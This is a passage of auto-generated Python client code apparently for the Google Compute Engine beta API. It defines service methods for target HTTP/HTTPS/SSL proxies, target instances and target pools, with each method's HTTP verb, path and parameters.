global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetHttpProxy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetHttpProxies.get',
ordered_params=[u'project', u'targetHttpProxy'],
path_params=[u'project', u'targetHttpProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetHttpProxies/{targetHttpProxy}',
request_field='',
request_type_name=u'ComputeTargetHttpProxiesGetRequest',
response_type_name=u'TargetHttpProxy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetHttpProxy resource in the specified project using the data included in the request.
Args:
request: (ComputeTargetHttpProxiesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpProxies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetHttpProxies',
request_field=u'targetHttpProxy',
request_type_name=u'ComputeTargetHttpProxiesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of TargetHttpProxy resources available to the specified project.
Args:
request: (ComputeTargetHttpProxiesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetHttpProxyList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetHttpProxies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/targetHttpProxies',
request_field='',
request_type_name=u'ComputeTargetHttpProxiesListRequest',
response_type_name=u'TargetHttpProxyList',
supports_download=False,
)
def SetUrlMap(self, request, global_params=None):
"""Changes the URL map for TargetHttpProxy.
Args:
request: (ComputeTargetHttpProxiesSetUrlMapRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetUrlMap')
return self._RunMethod(
config, request, global_params=global_params)
SetUrlMap.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpProxies.setUrlMap',
ordered_params=[u'project', u'targetHttpProxy'],
path_params=[u'project', u'targetHttpProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/targetHttpProxies/{targetHttpProxy}/setUrlMap',
request_field=u'urlMapReference',
request_type_name=u'ComputeTargetHttpProxiesSetUrlMapRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeTargetHttpProxiesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpProxies.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/targetHttpProxies/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeTargetHttpProxiesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class TargetHttpsProxiesService(base_api.BaseApiService):
"""Service class for the targetHttpsProxies resource."""
_NAME = u'targetHttpsProxies'
def __init__(self, client):
super(ComputeBeta.TargetHttpsProxiesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified TargetHttpsProxy resource.
Args:
request: (ComputeTargetHttpsProxiesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetHttpsProxies.delete',
ordered_params=[u'project', u'targetHttpsProxy'],
path_params=[u'project', u'targetHttpsProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}',
request_field='',
request_type_name=u'ComputeTargetHttpsProxiesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetHttpsProxy resource. Get a list of available target HTTPS proxies by making a list() request.
Args:
request: (ComputeTargetHttpsProxiesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetHttpsProxy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetHttpsProxies.get',
ordered_params=[u'project', u'targetHttpsProxy'],
path_params=[u'project', u'targetHttpsProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}',
request_field='',
request_type_name=u'ComputeTargetHttpsProxiesGetRequest',
response_type_name=u'TargetHttpsProxy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetHttpsProxy resource in the specified project using the data included in the request.
Args:
request: (ComputeTargetHttpsProxiesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpsProxies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetHttpsProxies',
request_field=u'targetHttpsProxy',
request_type_name=u'ComputeTargetHttpsProxiesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of TargetHttpsProxy resources available to the specified project.
Args:
request: (ComputeTargetHttpsProxiesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetHttpsProxyList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetHttpsProxies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/targetHttpsProxies',
request_field='',
request_type_name=u'ComputeTargetHttpsProxiesListRequest',
response_type_name=u'TargetHttpsProxyList',
supports_download=False,
)
def SetQuicOverride(self, request, global_params=None):
"""Sets the QUIC override policy for TargetHttpsProxy.
Args:
request: (ComputeTargetHttpsProxiesSetQuicOverrideRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetQuicOverride')
return self._RunMethod(
config, request, global_params=global_params)
SetQuicOverride.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpsProxies.setQuicOverride',
ordered_params=[u'project', u'targetHttpsProxy'],
path_params=[u'project', u'targetHttpsProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}/setQuicOverride',
request_field=u'targetHttpsProxiesSetQuicOverrideRequest',
request_type_name=u'ComputeTargetHttpsProxiesSetQuicOverrideRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetSslCertificates(self, request, global_params=None):
"""Replaces SslCertificates for TargetHttpsProxy.
Args:
request: (ComputeTargetHttpsProxiesSetSslCertificatesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetSslCertificates')
return self._RunMethod(
config, request, global_params=global_params)
SetSslCertificates.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpsProxies.setSslCertificates',
ordered_params=[u'project', u'targetHttpsProxy'],
path_params=[u'project', u'targetHttpsProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/targetHttpsProxies/{targetHttpsProxy}/setSslCertificates',
request_field=u'targetHttpsProxiesSetSslCertificatesRequest',
request_type_name=u'ComputeTargetHttpsProxiesSetSslCertificatesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetSslPolicy(self, request, global_params=None):
"""Sets the SSL policy for TargetHttpsProxy. The SSL policy specifies the server-side support for SSL features. This affects connections between clients and the HTTPS proxy load balancer. They do not affect the connection between the load balancer and the backends.
Args:
request: (ComputeTargetHttpsProxiesSetSslPolicyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetSslPolicy')
return self._RunMethod(
config, request, global_params=global_params)
SetSslPolicy.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpsProxies.setSslPolicy',
ordered_params=[u'project', u'targetHttpsProxy'],
path_params=[u'project', u'targetHttpsProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetHttpsProxies/{targetHttpsProxy}/setSslPolicy',
request_field=u'sslPolicyReference',
request_type_name=u'ComputeTargetHttpsProxiesSetSslPolicyRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetUrlMap(self, request, global_params=None):
"""Changes the URL map for TargetHttpsProxy.
Args:
request: (ComputeTargetHttpsProxiesSetUrlMapRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetUrlMap')
return self._RunMethod(
config, request, global_params=global_params)
SetUrlMap.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpsProxies.setUrlMap',
ordered_params=[u'project', u'targetHttpsProxy'],
path_params=[u'project', u'targetHttpsProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/targetHttpsProxies/{targetHttpsProxy}/setUrlMap',
request_field=u'urlMapReference',
request_type_name=u'ComputeTargetHttpsProxiesSetUrlMapRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeTargetHttpsProxiesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetHttpsProxies.testIamPermissions',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/targetHttpsProxies/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeTargetHttpsProxiesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class TargetInstancesService(base_api.BaseApiService):
"""Service class for the targetInstances resource."""
_NAME = u'targetInstances'
def __init__(self, client):
super(ComputeBeta.TargetInstancesService, self).__init__(client)
self._upload_configs = {
}
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of target instances.
Args:
request: (ComputeTargetInstancesAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetInstanceAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetInstances.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/targetInstances',
request_field='',
request_type_name=u'ComputeTargetInstancesAggregatedListRequest',
response_type_name=u'TargetInstanceAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified TargetInstance resource.
Args:
request: (ComputeTargetInstancesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetInstances.delete',
ordered_params=[u'project', u'zone', u'targetInstance'],
path_params=[u'project', u'targetInstance', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/targetInstances/{targetInstance}',
request_field='',
request_type_name=u'ComputeTargetInstancesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetInstance resource. Get a list of available target instances by making a list() request.
Args:
request: (ComputeTargetInstancesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetInstance) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetInstances.get',
ordered_params=[u'project', u'zone', u'targetInstance'],
path_params=[u'project', u'targetInstance', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/targetInstances/{targetInstance}',
request_field='',
request_type_name=u'ComputeTargetInstancesGetRequest',
response_type_name=u'TargetInstance',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetInstance resource in the specified project and zone using the data included in the request.
Args:
request: (ComputeTargetInstancesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetInstances.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/zones/{zone}/targetInstances',
request_field=u'targetInstance',
request_type_name=u'ComputeTargetInstancesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of TargetInstance resources available to the specified project and zone.
Args:
request: (ComputeTargetInstancesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetInstanceList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetInstances.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/targetInstances',
request_field='',
request_type_name=u'ComputeTargetInstancesListRequest',
response_type_name=u'TargetInstanceList',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeTargetInstancesTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetInstances.testIamPermissions',
ordered_params=[u'project', u'zone', u'resource'],
path_params=[u'project', u'resource', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/targetInstances/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeTargetInstancesTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class TargetPoolsService(base_api.BaseApiService):
"""Service class for the targetPools resource."""
_NAME = u'targetPools'
def __init__(self, client):
super(ComputeBeta.TargetPoolsService, self).__init__(client)
self._upload_configs = {
}
def AddHealthCheck(self, request, global_params=None):
"""Adds health check URLs to a target pool.
Args:
request: (ComputeTargetPoolsAddHealthCheckRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddHealthCheck')
return self._RunMethod(
config, request, global_params=global_params)
AddHealthCheck.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.addHealthCheck',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/addHealthCheck',
request_field=u'targetPoolsAddHealthCheckRequest',
request_type_name=u'ComputeTargetPoolsAddHealthCheckRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AddInstance(self, request, global_params=None):
"""Adds an instance to a target pool.
Args:
request: (ComputeTargetPoolsAddInstanceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddInstance')
return self._RunMethod(
config, request, global_params=global_params)
AddInstance.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.addInstance',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/addInstance',
request_field=u'targetPoolsAddInstanceRequest',
request_type_name=u'ComputeTargetPoolsAddInstanceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AggregatedList(self, request, global_params=None):
"""Retrieves an aggregated list of target pools.
Args:
request: (ComputeTargetPoolsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetPoolAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetPools.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/targetPools',
request_field='',
request_type_name=u'ComputeTargetPoolsAggregatedListRequest',
response_type_name=u'TargetPoolAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified target pool.
Args:
request: (ComputeTargetPoolsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetPools.delete',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}',
request_field='',
request_type_name=u'ComputeTargetPoolsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified target pool. Get a list of available target pools by making a list() request.
Args:
request: (ComputeTargetPoolsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetPool) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetPools.get',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}',
request_field='',
request_type_name=u'ComputeTargetPoolsGetRequest',
response_type_name=u'TargetPool',
supports_download=False,
)
def GetHealth(self, request, global_params=None):
"""Gets the most recent health check results for each IP for the instance that is referenced by the given target pool.
Args:
request: (ComputeTargetPoolsGetHealthRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetPoolInstanceHealth) The response message.
"""
config = self.GetMethodConfig('GetHealth')
return self._RunMethod(
config, request, global_params=global_params)
GetHealth.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.getHealth',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/getHealth',
request_field=u'instanceReference',
request_type_name=u'ComputeTargetPoolsGetHealthRequest',
response_type_name=u'TargetPoolInstanceHealth',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a target pool in the specified project and region using the data included in the request.
Args:
request: (ComputeTargetPoolsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.insert',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetPools',
request_field=u'targetPool',
request_type_name=u'ComputeTargetPoolsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of target pools available to the specified project and region.
Args:
request: (ComputeTargetPoolsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetPoolList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetPools.list',
ordered_params=[u'project', u'region'],
path_params=[u'project', u'region'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/regions/{region}/targetPools',
request_field='',
request_type_name=u'ComputeTargetPoolsListRequest',
response_type_name=u'TargetPoolList',
supports_download=False,
)
def RemoveHealthCheck(self, request, global_params=None):
"""Removes health check URL from a target pool.
Args:
request: (ComputeTargetPoolsRemoveHealthCheckRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RemoveHealthCheck')
return self._RunMethod(
config, request, global_params=global_params)
RemoveHealthCheck.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.removeHealthCheck',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/removeHealthCheck',
request_field=u'targetPoolsRemoveHealthCheckRequest',
request_type_name=u'ComputeTargetPoolsRemoveHealthCheckRequest',
response_type_name=u'Operation',
supports_download=False,
)
def RemoveInstance(self, request, global_params=None):
"""Removes instance URL from a target pool.
Args:
request: (ComputeTargetPoolsRemoveInstanceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RemoveInstance')
return self._RunMethod(
config, request, global_params=global_params)
RemoveInstance.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.removeInstance',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/removeInstance',
request_field=u'targetPoolsRemoveInstanceRequest',
request_type_name=u'ComputeTargetPoolsRemoveInstanceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetBackup(self, request, global_params=None):
"""Changes a backup target pool's configurations.
Args:
request: (ComputeTargetPoolsSetBackupRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetBackup')
return self._RunMethod(
config, request, global_params=global_params)
SetBackup.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.setBackup',
ordered_params=[u'project', u'region', u'targetPool'],
path_params=[u'project', u'region', u'targetPool'],
query_params=[u'failoverRatio', u'requestId'],
relative_path=u'projects/{project}/regions/{region}/targetPools/{targetPool}/setBackup',
request_field=u'targetReference',
request_type_name=u'ComputeTargetPoolsSetBackupRequest',
response_type_name=u'Operation',
supports_download=False,
)
def TestIamPermissions(self, request, global_params=None):
"""Returns permissions that a caller has on the specified resource.
Args:
request: (ComputeTargetPoolsTestIamPermissionsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TestPermissionsResponse) The response message.
"""
config = self.GetMethodConfig('TestIamPermissions')
return self._RunMethod(
config, request, global_params=global_params)
TestIamPermissions.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetPools.testIamPermissions',
ordered_params=[u'project', u'region', u'resource'],
path_params=[u'project', u'region', u'resource'],
query_params=[],
relative_path=u'projects/{project}/regions/{region}/targetPools/{resource}/testIamPermissions',
request_field=u'testPermissionsRequest',
request_type_name=u'ComputeTargetPoolsTestIamPermissionsRequest',
response_type_name=u'TestPermissionsResponse',
supports_download=False,
)
class TargetSslProxiesService(base_api.BaseApiService):
"""Service class for the targetSslProxies resource."""
_NAME = u'targetSslProxies'
def __init__(self, client):
super(ComputeBeta.TargetSslProxiesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified TargetSslProxy resource.
Args:
request: (ComputeTargetSslProxiesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.targetSslProxies.delete',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}',
request_field='',
request_type_name=u'ComputeTargetSslProxiesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified TargetSslProxy resource. Get a list of available target SSL proxies by making a list() request.
Args:
request: (ComputeTargetSslProxiesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetSslProxy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetSslProxies.get',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}',
request_field='',
request_type_name=u'ComputeTargetSslProxiesGetRequest',
response_type_name=u'TargetSslProxy',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a TargetSslProxy resource in the specified project using the data included in the request.
Args:
request: (ComputeTargetSslProxiesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetSslProxies',
request_field=u'targetSslProxy',
request_type_name=u'ComputeTargetSslProxiesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of TargetSslProxy resources available to the specified project.
Args:
request: (ComputeTargetSslProxiesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(TargetSslProxyList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.targetSslProxies.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/targetSslProxies',
request_field='',
request_type_name=u'ComputeTargetSslProxiesListRequest',
response_type_name=u'TargetSslProxyList',
supports_download=False,
)
def SetBackendService(self, request, global_params=None):
"""Changes the BackendService for TargetSslProxy.
Args:
request: (ComputeTargetSslProxiesSetBackendServiceRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetBackendService')
return self._RunMethod(
config, request, global_params=global_params)
SetBackendService.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.setBackendService',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setBackendService',
request_field=u'targetSslProxiesSetBackendServiceRequest',
request_type_name=u'ComputeTargetSslProxiesSetBackendServiceRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetProxyHeader(self, request, global_params=None):
"""Changes the ProxyHeaderType for TargetSslProxy.
Args:
request: (ComputeTargetSslProxiesSetProxyHeaderRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetProxyHeader')
return self._RunMethod(
config, request, global_params=global_params)
SetProxyHeader.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.targetSslProxies.setProxyHeader',
ordered_params=[u'project', u'targetSslProxy'],
path_params=[u'project', u'targetSslProxy'],
query_params=[u'requestId'],
relative_path=u'projects/{project}/global/targetSslProxies/{targetSslProxy}/setProxyHeader',
request_field=u'targetSslProxiesSetProxyHeaderRequest',
request_type_name=u'ComputeTargetSslProxiesSetProxyHeaderRequest',
response_type_name=u'Operation',
